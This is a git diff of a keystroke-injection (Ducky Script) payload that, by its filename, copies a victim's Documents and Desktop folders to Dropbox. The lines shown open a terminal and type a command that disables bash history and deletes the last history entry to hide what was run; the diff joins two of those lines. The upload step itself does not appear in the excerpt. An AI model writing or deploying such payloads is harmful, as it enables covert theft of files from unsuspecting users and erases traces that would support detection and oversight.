diff --git a/Executions/Docs and Desktop to Dropbox API.txt b/Executions/Docs and Desktop to Dropbox API.txt index 977c4e6..30ccc84 100644 --- a/Executions/Docs and Desktop to Dropbox API.txt +++ b/Executions/Docs and Desktop to Dropbox API.txt @@ -18,8 +18,7 @@ STRING Terminal DELAY 1000 ENTER DELAY 500 -STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash -history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') DELAY 500 ENTER DELAY 500